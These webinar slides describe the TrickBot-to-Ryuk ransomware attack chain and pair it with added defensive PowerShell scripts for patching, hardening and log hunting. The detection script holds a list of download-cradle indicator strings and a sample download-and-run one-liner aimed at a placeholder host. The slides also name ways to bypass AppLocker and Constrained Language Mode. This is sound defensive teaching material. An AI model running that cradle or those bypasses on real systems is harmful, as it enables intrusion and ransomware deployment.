Webinar 1540 Slides


3/19/2019

Anatomy of a Hack: How TEMP.Mixmaster Attackers Use TrickBot and Ryuk To Poach Big Game

© 2019 Monterey Technology Group Inc.



PAGE 3
Anatomy of an Attack
Ryuk & Trickbot
Webinar
March 19, 2019

Copyright © 2019 STEALTHbits Technologies, Inc. All rights reserved. | STEALTHbits Confidential

PAGE 4
Agenda

• Introductions
• The Evolution of Ransomware
• Breakdown of Ryuk & Trickbot
• Live Demo of PowerShell Empire
• Mitigation & Detection
• Live Demo of Mitigation & Detection
• Q&A
• Next Steps


PAGE 5
Jeff Warren
General Manager, Products
STEALTHbits Technologies


PAGE 6
Evolution of Ransomware


PAGE 7
Evolution of Ransomware

Timeline:
1989: AIDS Trojan Virus
2013: CryptoLocker
2015: SamSam
2017: EternalBlue, WannaCry, Petya/NotPetya
2018: Ryuk


PAGE 8
Characteristics of Modern Ransomware Attacks

• Targeted
• Recon
• Exploits
• Lateral Movement
• Dwell Time


PAGE 9
Trickbot & Ryuk


PAGE 10
Overview of Trickbot & Ryuk

• TrickBot trojan used for initial compromise
• Ryuk ransomware encrypts data days/weeks/months later
• Source code derived from commodity ransomware Hermes
• Attributed to threat actors out of Russia (GRIM SPIDER)

$4M extorted from enterprises between August and December of 2018


PAGE 11
Initial Infection with Trickbot

• Often done through phishing
• Office documents with embedded macros
• Once run, downloads and executes Trickbot from remote server

Source: FireEye


PAGE 12
Trickbot's Bag of Tricks

Task: Gather information from the infected user's system
• systeminfo – computer specs (operating system, architecture, processor)
• networkdll – gathers machine data (username, domain name, etc.)

Task: Infect more machines within the system
• wormdll – SMB exploit (MS17-010)
• sharedll – drops copies in administrative shares C$ or ADMIN$
• tabdll

Task: Steal credentials and intercept connections to certain banking sites
• injectdll
• importdll
• mailsearcher
• pwgrab

Task: PowerShell Empire module for reverse shell
• NewBCtestnDll64

Source: TrendMicro


PAGE 13
Recon & Lateral Movement

• May be months after initial Trickbot infection until Ryuk is deployed
• TrickBot's reverse-shell module (NewBCtestDll) used to execute obfuscated PowerShell scripts which ultimately download and launch an Empire backdoor.
• Manual interaction to determine targets and prepare for Ryuk

Source: FireEye


PAGE 14
Spreading Laterally with Trickbot

Trickbot spreads through three modules:
• wormdll – SMB exploit (MS17-010)
• NewBCtestnDll64 – Mimikatz credential theft
• sharedll – admin$ and c$ administrative shares


PAGE 15
Dropping Ryuk

• Actors produce a list of target systems and save it to one or multiple .txt files.
• Copy PsExec, Ryuk, and scripts to domain controllers or other high privilege systems
• Copy a Ryuk sample to each host contained in the .txt files and execute them.

Source: CrowdStrike


PAGE 16
Real World Example – Ryuk (Q3 2018)
• Using stolen credentials the attacker copied AdFind.exe onto a domain controller
• AdFind.exe was executed (twice) to collect information about Active Directory
• Attacker tested access to multiple domain controllers in the victim environment
• The attacker logged into a DC and copied PSExec.exe, a batch script used to kill
processes and stop services, and an instance of Ryuk onto the system.
• Using PsExec the attacker copied the process/service killing batch script to the
%TEMP% folder on hundreds of computers across the victim environment, from which
it was then executed.
• The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot%
directories of these same computers. A new service configured to launch the Ryuk
binary was then created and started.
• Ryuk execution proceeded as normal, encrypting files on impacted systems.
Source: FireEye


PAGE 17
Overview of the Attack
1. An obfuscated PowerShell script is executed and connects to a remote IP address.
2. A reverse shell is downloaded and executed on the compromised host.
3. PowerShell anti-logging scripts are executed on the host.
4. Reconnaissance of the network is conducted using standard Windows command line tools along with external uploaded tools.
5. Lateral movement throughout the network is enabled using Remote Desktop Protocol (RDP).
6. Service User Accounts are created.
7. PowerShell Empire is downloaded and installed as a service.
8. Lateral movement is continued until privileges are recovered to obtain access to a domain controller.
9. PSEXEC is used to push out the Ryuk binary to individual hosts.
10. Batch scripts are executed to terminate processes/services and remove backups, followed by the Ryuk binary.

Source: CrowdStrike®


PAGE 18
LIVE DEMO
PowerShell Empire


PAGE 19
PowerShell Empire – Demo Overview

Targets: Weak PC, Hardened PC
Steps: Infect PC → Perform Reconnaissance → Compromise Accounts → Compromise SQL Server (MS SQL)


PAGE 20
Mitigating the Attack


PAGE 21
How Does Trickbot Spread?

Step 1: SMB v1 vulnerability MS17-010
Step 2: Obfuscated PowerShell scripts & reverse shells
Step 3: LDAP Recon to find high value targets
Step 4: Credential compromise & administrative network shares

Source: CrowdStrike


PAGE 22
Mitigation of MS17-010 Vulnerability

• Install KB4012598 to patch vulnerability in SMBv1
• Disable SMBv1 altogether

https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and
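The two bullets above can be checked and applied from PowerShell. The following script is an added example, not part of the STEALTHbits deck; it assumes an elevated Windows PowerShell 5.1 session on Windows 8.1 / Server 2012 R2 or later (for the SmbShare cmdlets), and that the SMB1Protocol optional feature exists, which is the case on Windows 10 / Server 2016 and later.

```powershell
# Added example, not from the deck: audit SMBv1 exposure on this host and turn SMBv1 off.

function Get-SmbV1Status {
    $server  = Get-SmbServerConfiguration
    $feature = $null
    try {
        $feature = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction Stop
    } catch { }   # older builds have no SMB1Protocol optional feature

    [pscustomobject]@{
        ComputerName       = $env:COMPUTERNAME
        SmbV1ServerEnabled = $server.EnableSMB1Protocol
        SmbV1FeatureState  = if ($feature) { "$($feature.State)" } else { 'NotAvailable' }
        # Get-HotFix only matches this exact KB. On Windows 10 / Server 2016 the MS17-010 fix
        # shipped inside cumulative updates under other KB numbers, so check those separately.
        KB4012598Installed = [bool](Get-HotFix -Id KB4012598 -ErrorAction SilentlyContinue)
    }
}

function Disable-SmbV1 {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Disable SMBv1')) {
        # Stop the SMB server from speaking SMBv1 immediately ...
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
        # ... and remove the SMBv1 component where the optional feature exists (finishes on reboot).
        Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart -ErrorAction SilentlyContinue | Out-Null
    }
}

Get-SmbV1Status | Format-List
Disable-SmbV1 -WhatIf     # drop -WhatIf to apply the change
```

Run Get-SmbV1Status across a fleet first: a host that reports SmbV1ServerEnabled = True and no patch is exactly the wormdll target described earlier in the deck, and disabling the protocol removes the attack surface regardless of patch level.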


PAGE 23
PowerShell Security – Constrained Language Mode

• Introduced in PowerShell 3.0
• What does Constrained Language Mode prevent?
  – Only approved .NET types are allowed.
  – The Add-Type cmdlet can load signed assemblies, but it cannot load arbitrary C# code or Win32 APIs.
  – COM objects are blocked.
• How to Enable?
  – Device Guard User Mode Code Integrity (UMCI), now Windows Defender Application Control
  – AppLocker in allow mode
  – Can be controlled by environmental variable, but that is not secure! Use one of the above techniques


PAGE 24
Empire Launcher with Constrained Language Mode


PAGE 25
Constrained Language Mode Bypass

Invoke-History bypassed Constrained Language mode until patched 2/19/2019

Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0632


PAGE 26
AppLocker

• When running with Allow actions, this will enforce Constrained Language
Mode
• Can be bypassed by stopping the AppID service
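Because Constrained Language Mode can be set in ways that do not actually enforce it (the environment variable) and AppLocker's enforcement depends on a service that can be stopped, it is worth verifying the mode from inside a session rather than trusting the policy. The following probe is an added example, not from the deck; it assumes Windows PowerShell 5.1, tries the three operations the slide says CLM blocks, and records the state of the Application Identity service (AppIDSvc). The class name ClmProbe is a constructed name used only by the probe.

```powershell
# Added example, not from the deck: confirm Constrained Language Mode is really in force.

function Test-ConstrainedLanguage {
    # String interpolation rather than .ToString(), so the probe itself runs under CLM.
    $r = [ordered]@{ LanguageMode = "$($ExecutionContext.SessionState.LanguageMode)" }

    # 1. Arbitrary C# through Add-Type must be refused (only signed assemblies may load).
    try {
        if (-not ('ClmProbe' -as [type])) {
            Add-Type -TypeDefinition 'public class ClmProbe { public static int One() { return 1; } }' -ErrorAction Stop
        }
        $r.AddTypeBlocked = $false
    } catch { $r.AddTypeBlocked = $true }

    # 2. COM objects must be refused.
    try { $null = New-Object -ComObject WScript.Shell -ErrorAction Stop; $r.ComBlocked = $false }
    catch { $r.ComBlocked = $true }

    # 3. Only the approved core .NET types are allowed; System.Net.WebClient (the usual
    #    download-cradle type) is not one of them.
    try { $null = New-Object System.Net.WebClient -ErrorAction Stop; $r.DotNetTypeBlocked = $false }
    catch { $r.DotNetTypeBlocked = $true }

    # 4. A mode that comes only from the environment variable is not a security boundary;
    #    surface it so it is not mistaken for UMCI/AppLocker enforcement.
    $r.LockdownEnvVarSet = [bool]$env:__PSLockdownPolicy

    # 5. AppLocker enforcement rides on the Application Identity service; the slide notes that
    #    stopping it bypasses the policy, so its state and start type belong in the report.
    $svc = Get-Service AppIDSvc -ErrorAction SilentlyContinue
    $r.AppIDSvcStatus    = if ($svc) { "$($svc.Status)" }    else { 'NotFound' }
    $r.AppIDSvcStartType = if ($svc) { "$($svc.StartType)" } else { 'NotFound' }

    [pscustomobject]$r
}

Test-ConstrainedLanguage | Format-List
```

A hardened host should report LanguageMode = ConstrainedLanguage with all three Blocked fields True, LockdownEnvVarSet False, and AppIDSvc Running with an Automatic start type; any other combination means the launcher shown on the "Empire Launcher with Constrained Language Mode" slide would not be stopped on that machine.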


PAGE 27
Preventing PowerShell Downgrade Attacks

• PowerShell 2.0 is not limited by Constrained Language Mode; if possible, disable it
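Removing the 2.0 engine and watching for sessions that still manage to start it go together. The script below is an added example, not from the deck; it assumes an elevated Windows PowerShell 5.1 session on Windows 10 / Server 2016 or later, where the engine is the MicrosoftWindowsPowerShellV2Root optional feature (on Server it can also be removed with Remove-WindowsFeature PowerShell-V2). Detection relies on event 400 in the classic "Windows PowerShell" log, whose message carries the EngineVersion that was started.

```powershell
# Added example, not from the deck: remove the PowerShell 2.0 engine and find sessions that used it.

function Get-PowerShellV2Status {
    foreach ($name in 'MicrosoftWindowsPowerShellV2Root', 'MicrosoftWindowsPowerShellV2') {
        $f = Get-WindowsOptionalFeature -Online -FeatureName $name -ErrorAction SilentlyContinue
        [pscustomobject]@{ Feature = $name; State = if ($f) { "$($f.State)" } else { 'NotPresent' } }
    }
}

function Disable-PowerShellV2 {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Remove PowerShell 2.0 engine')) {
        Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
    }
}

function Find-PowerShellDowngradeEvents {
    param([int]$MaxEvents = 1000)
    # Event 400 ("Engine state is changed from None to Available") is written by every engine
    # start and includes EngineVersion=... and HostApplication=... lines in its message.
    # EngineVersion=2.0 means the legacy engine ran, which CLM does not constrain.
    Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        Select-Object TimeCreated,
            @{ n = 'HostApplication'; e = { if ($_.Message -match 'HostApplication=(.+)') { $Matches[1].Trim() } } }
}

Get-PowerShellV2Status
Find-PowerShellDowngradeEvents | Format-Table -AutoSize
Disable-PowerShellV2 -WhatIf     # drop -WhatIf to apply the change
```

Keep the event query running even after the feature is removed: a hit after removal indicates a host where the feature came back, or one that was never cleaned up.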


PAGE 28
Restrict Admin Rights

• Administrators and privileged local groups
• Admin-equivalences such as
  – Act as part of the OS (SeTcbPrivilege)
  – Debug programs (SeDebugPrivilege)
  – Take Ownership (SeTakeOwnershipPrivilege)

“Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. It takes no action if the adjustment of the token privileges fails.”
CrowdStrike
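The CrowdStrike quote is the reason the three privileges matter: a user whose token cannot acquire SeDebugPrivilege stops Ryuk before it injects. The audit below is an added example, not from the deck; it assumes an elevated Windows PowerShell 5.1 session and uses secedit.exe to export the effective local user-rights assignment (domain GPOs are already merged in), then resolves each holder SID to an account name. By default only the local Administrators group holds SeDebugPrivilege and SeTakeOwnershipPrivilege, and nobody holds SeTcbPrivilege; anything else in the output deserves a question.

```powershell
# Added example, not from the deck: list who holds the admin-equivalent privileges named on the slide.

function Get-SensitivePrivilegeHolders {
    param(
        [string[]]$Privilege = @('SeTcbPrivilege', 'SeDebugPrivilege', 'SeTakeOwnershipPrivilege')
    )
    $inf = Join-Path $env:TEMP ('rights-{0}.inf' -f [guid]::NewGuid().ToString('N'))
    try {
        # secedit writes an INI file; the [Privilege Rights] section has lines such as
        #   SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-...-1001
        # where a leading '*' marks a SID. A privilege absent from the file has no holders.
        & secedit.exe /export /cfg $inf /areas USER_RIGHTS /quiet | Out-Null

        foreach ($line in Get-Content $inf) {
            if ($line -notmatch '^(Se\w+)\s*=\s*(.*)$') { continue }
            $name = $Matches[1]
            $holders = $Matches[2]
            if ($Privilege -notcontains $name) { continue }

            foreach ($entry in ($holders -split ',')) {
                $sid = $entry.Trim().TrimStart('*')
                if (-not $sid) { continue }
                $account = $sid
                try {
                    $account = ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                                   [System.Security.Principal.NTAccount]).Value
                } catch { }   # unresolvable SID, or already a plain account name: keep as-is
                [pscustomobject]@{ Privilege = $name; Holder = $account; Sid = $sid }
            }
        }
    } finally {
        Remove-Item $inf -ErrorAction SilentlyContinue
    }
}

Get-SensitivePrivilegeHolders | Sort-Object Privilege, Holder | Format-Table -AutoSize
```

Pair this with a review of local Administrators membership: the privileges are inherited through that group, so an ordinary user who is a local admin can still satisfy Ryuk's SeDebugPrivilege check even though the user-rights assignment looks clean.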


PAGE 29
Detecting the Attack


PAGE 30
PowerShell Script Block Logging

• Many tools, like Empire, use encoded commands


PAGE 31
PowerShell Script Block Logging

• Traditional PowerShell logging shows encoded commands


PAGE 32
PowerShell Script Block Logging

• Script Block Logging captures commands after they are decoded by PowerShell


PAGE 33
PowerShell Script Block Logging

• Even if the command opens a web cradle to pull down code, it will show the results


PAGE 34
Enabling PowerShell Script Block Logging

• Administrative Templates → Windows Components → Windows PowerShell
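The GPO path above writes a single registry value, and once it is set the decoded text lands in event 4104 of the Microsoft-Windows-PowerShell/Operational log. The script below is an added example, not from the deck; it assumes Windows PowerShell 5.1 and an elevated session for the registry write, and the indicator list is constructed for the example (substrings that the decoded form of encoded launchers and web cradles typically contains), not indicators taken from the deck.

```powershell
# Added example, not from the deck: enable Script Block Logging and hunt the decoded 4104 events.

$ScriptBlockLoggingKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Enable-ScriptBlockLogging {
    # Prefer the GPO in a domain; the direct registry write suits standalone hosts and labs.
    if (-not (Test-Path $ScriptBlockLoggingKey)) { New-Item -Path $ScriptBlockLoggingKey -Force | Out-Null }
    Set-ItemProperty -Path $ScriptBlockLoggingKey -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

# Constructed indicator list: strings that show up once an encoded launcher or web cradle is decoded.
$Indicators = 'FromBase64String', 'DownloadString', 'DownloadFile', 'Net.WebClient', 'Invoke-Expression',
              'IEX', '-EncodedCommand', '-enc ', 'Start-BitsTransfer', 'Invoke-WebRequest'

function Get-ScriptBlockIndicators {
    param([string]$ScriptBlockText)
    # Case-insensitive substring match; returns every indicator found so hits can be ranked.
    $Indicators | Where-Object { $ScriptBlockText -like "*$_*" }
}

function Find-SuspiciousScriptBlocks {
    param([datetime]$Since = (Get-Date).AddDays(-1), [int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 properties: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path.
            # Long scripts are split across several events that share one ScriptBlockId.
            $text = [string]$_.Properties[2].Value
            $hits = @(Get-ScriptBlockIndicators -ScriptBlockText $text)
            if ($hits.Count -gt 0) {
                $flat = $text -replace '\s+', ' '
                [pscustomobject]@{
                    TimeCreated   = $_.TimeCreated
                    ScriptBlockId = $_.Properties[3].Value
                    Part          = '{0}/{1}' -f $_.Properties[0].Value, $_.Properties[1].Value
                    Indicators    = $hits -join ','
                    Preview       = $flat.Substring(0, [Math]::Min(120, $flat.Length))
                }
            }
        }
}

# Constructed sample: the decoded form of a typical download-and-run one-liner, to show what
# the matcher keys on (returns DownloadString, Net.WebClient and IEX).
Get-ScriptBlockIndicators -ScriptBlockText 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/x")'

Find-SuspiciousScriptBlocks | Format-Table -AutoSize
```

Script block logging records what ran, not what was typed, which is why an -EncodedCommand launcher and the code it fetches both appear in clear text; forward the 4104 channel to central logging, since a local attacker with admin rights can clear it.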


PAGE 35
Additional Detections to Consider

Attack Indicator      Detection Difficulty   Detection Accuracy
Pass-the-Hash         Medium                 High
LDAP Reconnaissance   High                   Low
Pass-the-Ticket       High                   Medium
Overpass-the-Hash     Medium                 High
DC Sync               Medium                 Medium
…                     …                      …


PAGE 36
LIVE DEMO
Attack Detection &
Mitigation


PAGE 37
STEALTHbits’ Active Directory Solution Architecture

Resources: Active Directory (Authentication, Objects, GPOs, Permissions, LDAP, Attributes, Replication, Configurations); Azure Active Directory; AD-Connected Resources (Applications, Systems, Data, Unstructured Data, Cloud Data, Structured Data)
Approach: Differential, Agent-less, Least Privilege, LSASS Agent Blocking
Platform Services: Reporting & Governance; Rollback & Recovery; Threat Detection & Response; Clean Up & Remediation; Alerting; Blocking
Integration Points: REST API, SQL, Syslog, …


PAGE 38
STEALTHbits’ Active Directory Solution

Security Threats
• Identify and eliminate weak passwords
• Prevent unauthorized changes and authentication
• Identify and remediate configuration and permission vulnerabilities
• Detect modern threats against AD in real-time
• Identify abnormal behavior (UBA)
• Automatically respond to threats and abnormalities for instant containment

Operations
• Automate account deprovisioning
• Clean-up stale and toxic objects
• Rollback and recover from changes and deletions

Compliance
• Govern group memberships
• Automate privileged access reporting
• Control access to sensitive security groups and data


PAGE 39
STEALTHbits’ Active Directory Product Portfolio

Policy & Password Enforcement Threat Detection & Response

Rollback & Recovery Reporting & Governance


PAGE 40
Modern AD Attacks

• SPN Scanning
• Privileged Accounts
• Sensitive Servers
• Kerberoast
• Silver Tickets
• DC Sync
• Password spraying
• Pass-the-Ticket
• Pass-the-Hash
• Overpass-the-Hash
• Trust Tickets
• NTDS.dit
• AdminSDHolder
• Golden Tickets
• Skeleton Key
• SID History
• SPNs
• Malicious SSPs


PAGE 41
Next Steps

• Learn More
– https://attack.stealthbits.com
• Download a Trial
– Visit https://www.stealthbits.com/free-trial
• Contact Us
– Visit https://www.stealthbits.com/contact


PAGE 42

©STEALTHbits Technologies, Inc. All rights reserved. STEALTHbits and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries.
The information herein is for informational purposes only and represents the current view of STEALTHbits Technologies as of the date of this presentation. Because STEALTHbits must respond to changing market conditions, it should not be interpreted to be a commitment on the part of STEALTHbits, and STEALTHbits cannot guarantee the accuracy of any information provided after the date of this presentation. STEALTHBITS MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.
